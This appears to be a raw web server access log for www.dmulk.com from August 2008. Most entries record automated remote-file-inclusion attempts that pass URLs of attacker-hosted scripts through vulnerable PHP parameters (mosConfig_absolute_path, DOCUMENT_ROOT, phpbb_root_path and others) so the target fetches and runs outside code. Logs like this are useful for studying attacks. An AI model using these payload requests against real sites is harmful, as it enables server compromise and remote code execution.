62.210.139.66 - - [31/Aug/2008:11:41:20 -0700] "GET /logs/access_080218.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
69.94.70.15 - - [31/Aug/2008:11:41:20 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://kosherkash.net/public/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:11:41:36 -0700] "GET /bikes/?D=A HTTP/1.0" 200 2719 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.97.132.101 - - [31/Aug/2008:11:41:44 -0700] "GET /templates/header.php?int_path=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [31/Aug/2008:11:41:44 -0700] "GET /logs/templates/header.php?int_path=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
212.97.132.101 - - [31/Aug/2008:11:41:44 -0700] "GET /logs/access_080611.log/templates/header.php?int_path=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:41:53 -0700] "GET /logs/access_080312.log//?pg=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:41:55 -0700] "GET //?pg=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 89357 "-" "libwww-perl/5.79" "www.dmulk.com"
212.97.132.101 - - [31/Aug/2008:11:41:56 -0700] "GET /logs/access_080609.log/templates/header.php?int_path=http://membres.lycos.fr/netwo0rk/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:41:56 -0700] "GET /logs//?pg=http://albcrew.t35.com/pw.txt? HTTP/1.1" 200 63005 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:41:57 -0700] "GET /logs/access_080329.log//?pg=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:42:24 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:42:31 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.museoscout.com.ar//components/com_extcalendar/lib/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:42:31 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.museoscout.com.ar//components/com_extcalendar/lib/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:42:36 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.67.23.3 - - [31/Aug/2008:11:42:40 -0700] "GET /language/lang_german/lang_main_album.php?phpbb_root_path=http://apuao.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.3 - - [31/Aug/2008:11:42:40 -0700] "GET /logs/language/lang_german/lang_main_album.php?phpbb_root_path=http://apuao.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.3 - - [31/Aug/2008:11:42:44 -0700] "GET /logs/access_071219.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://apuao.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.23.3 - - [31/Aug/2008:11:42:44 -0700] "GET /logs/access_071221.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://apuao.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:42:48 -0700] "GET /convert/mvcw.php?vwar_root=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.25.180.198 - - [31/Aug/2008:11:42:48 -0700] "GET /logs/convert/mvcw.php?vwar_root=http://www.fileden.com/files/2008/6/19/1967132/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.77.184.232 - - [31/Aug/2008:11:42:54 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:43:19 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:43:19 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:43:20 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:43:20 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.ecolnet.org/response.txt???? HTTP/1.1" 200 89532 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:43:24 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.23.3 - - [31/Aug/2008:11:43:28 -0700] "GET /logs/access_080704.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://apuao.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.189.11 - - [31/Aug/2008:11:43:30 -0700] "GET /logs/scripts.log//ws/get_events.php?includedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [31/Aug/2008:11:43:30 -0700] "GET //ws/get_events.php?includedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.189.11 - - [31/Aug/2008:11:43:30 -0700] "GET /logs//ws/get_events.php?includedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:43:40 -0700] "GET /admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:43:41 -0700] "GET /logs/admin.remository.php?mosConfig_absolute_path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:11:44:08 -0700] "GET /logs/access_080728.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.17.6.7 - - [31/Aug/2008:11:44:12 -0700] "GET /logs/access_080127.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:44:28 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/masheru83/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:11:44:29 -0700] "GET /bikes/dteel/2008_02_07/?N=A HTTP/1.0" 200 2521 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:44:30 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.geocities.com/masheru83/id.txt?? HTTP/1.1" 200 89510 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:44:31 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.geocities.com/masheru83/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.68.149 - - [31/Aug/2008:11:44:49 -0700] "GET //modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.210.139.66 - - [31/Aug/2008:11:45:08 -0700] "GET /logs/access_080119.log//admin.a6mambocredits.php?mosConfig_live_site=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:45:19 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:11:45:20 -0700] "GET /logs/errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.19.158.41 - - [31/Aug/2008:11:45:20 -0700] "GET /errors.php?error=http://rafiantika.fileave.com/child.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:45:20 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 89555 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [31/Aug/2008:11:45:21 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bjork.name.md/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:45:22 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:45:24 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://www.geocities.com/masheru83/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:45:31 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:45:32 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 200 89571 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:45:34 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:11:45:44 -0700] "GET /bikes/dteel/2008_07_03/?N=D HTTP/1.0" 200 835 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
208.99.194.216 - - [31/Aug/2008:11:45:45 -0700] "GET /logs/access_080810.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bjork.name.md/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [31/Aug/2008:11:45:45 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bjork.name.md/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
208.99.194.216 - - [31/Aug/2008:11:45:45 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bjork.name.md/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.227 - - [31/Aug/2008:11:45:53 -0700] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:46:02 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.195.197.20 - - [31/Aug/2008:11:46:07 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://www.gugn.ru/news/data/archives/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
121.180.11.132 - - [31/Aug/2008:11:46:07 -0700] "GET /logs/access_080122.log//?custompluginfile[]=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [31/Aug/2008:11:46:07 -0700] "GET /logs//?custompluginfile[]=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 63005 "-" "libwww-perl/5.65" "www.dmulk.com"
121.180.11.132 - - [31/Aug/2008:11:46:08 -0700] "GET //?custompluginfile[]=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 89541 "-" "libwww-perl/5.65" "www.dmulk.com"
217.133.215.166 - - [31/Aug/2008:11:46:45 -0700] "GET /logs/access_071222.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [31/Aug/2008:11:46:49 -0700] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.133.215.166 - - [31/Aug/2008:11:46:52 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:46:56 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:47:12 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:11:47:39 -0700] "GET /logs/access_080802.log//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:11:47:42 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.0" 200 89397 "-" "libwww-perl/5.803" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:11:47:47 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.99.194.216 - - [31/Aug/2008:11:47:56 -0700] "GET /logs/access_080703.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bjork.name.md/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.56.164.90 - - [31/Aug/2008:11:48:52 -0700] "GET /logs/access_080804.log//index.php?abg_path=http://albcrew.t35.com/pw.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:48:57 -0700] "GET /logs/access_080723.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:48:58 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:48:59 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.19.61.90 - - [31/Aug/2008:11:49:05 -0700] "GET /logs/access_080606.log/demo1/auction_confirmation.inc.php/header.php?prefix=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:49:10 -0700] "GET /logs/access_080519.log/index.php?opcao=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:49:10 -0700] "GET /logs/access_080510.log/index.php?opcao=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:49:10 -0700] "GET /logs/index.php?opcao=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.111.117 - - [31/Aug/2008:11:49:16 -0700] "GET /index.php?opcao=http://amc.phpnet.us/AMCrew.txt???? HTTP/1.1" 200 89451 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [31/Aug/2008:11:50:03 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [31/Aug/2008:11:50:03 -0700] "GET /logs//index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [31/Aug/2008:11:50:05 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [31/Aug/2008:11:50:05 -0700] "GET //index.php?abg_path=http://albcrew.t35.com/nid.txt? HTTP/1.1" 200 89437 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:50:28 -0700] "GET /?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89477 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:50:30 -0700] "GET /logs/?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:50:39 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
87.226.77.5 - - [31/Aug/2008:11:50:40 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://xvascainox7.sites.uol.com.br/v6.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:50:56 -0700] "GET /?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89482 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:50:58 -0700] "GET /logs/?INCLUDE_FOLDER=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:51:17 -0700] "GET /?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89461 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:51:20 -0700] "GET /logs/?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:51:24 -0700] "GET /?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89477 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:51:26 -0700] "GET /logs/?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:51:31 -0700] "GET /logs/access_080528.log//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:51:35 -0700] "GET /logs/access_080528.log//index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
80.67.23.3 - - [31/Aug/2008:11:51:52 -0700] "GET /logs/access_080712.log%20/language/lang_german/lang_main_album.php?phpbb_root_path=http://apuao.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:51:52 -0700] "GET /?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 89477 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [31/Aug/2008:11:51:54 -0700] "GET /logs/?DOCUMENT_ROOT=http://216.155.36.4/~prince/di???? HTTP/1.1" 200 63000 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:51:55 -0700] "GET /logs/access_080606.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:51:59 -0700] "GET /logs/access_080715.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:52:00 -0700] "GET /logs/access_080711.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
81.169.169.235 - - [31/Aug/2008:11:52:00 -0700] "GET /logs/access_080712.log//bemarket/postscript/postscript.php?p_mode=http://www.chilecapacita.cl/nweb_portal/uploads/spypsy/help/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:52:14 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.museoscout.com.ar//components/com_extcalendar/lib/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:52:14 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.museoscout.com.ar//components/com_extcalendar/lib/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:52:41 -0700] "GET /logs/access_080714.log/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:52:43 -0700] "GET /src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.67.23.3 - - [31/Aug/2008:11:52:44 -0700] "GET /logs/access_080711.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://apuao.com/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:52:45 -0700] "GET /logs/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:53:08 -0700] "GET /logs/access_080225.log//index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:53:08 -0700] "GET //index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.127.70.16 - - [31/Aug/2008:11:53:09 -0700] "GET /logs//index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:53:28 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:53:29 -0700] "GET /logs/components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:53:29 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.68.220 - - [31/Aug/2008:11:53:29 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.199.190.37 - - [31/Aug/2008:11:53:32 -0700] "GET /logs/access_080419.log/index.php?option=com_custompages&cpage=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:53:33 -0700] "GET /logs/access_080820.log//includes/header.php?c_temp_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:53:33 -0700] "GET /logs/access_080225.log//index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:53:33 -0700] "GET /logs/access_080225.log//index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:53:34 -0700] "GET //index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:53:35 -0700] "GET //includes/header.php?c_temp_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
88.84.157.43 - - [31/Aug/2008:11:53:35 -0700] "GET /logs//index2.php?x=http://jofchurch.org/calendar//tools/helpid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [31/Aug/2008:11:53:37 -0700] "GET /logs//includes/header.php?c_temp_path=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
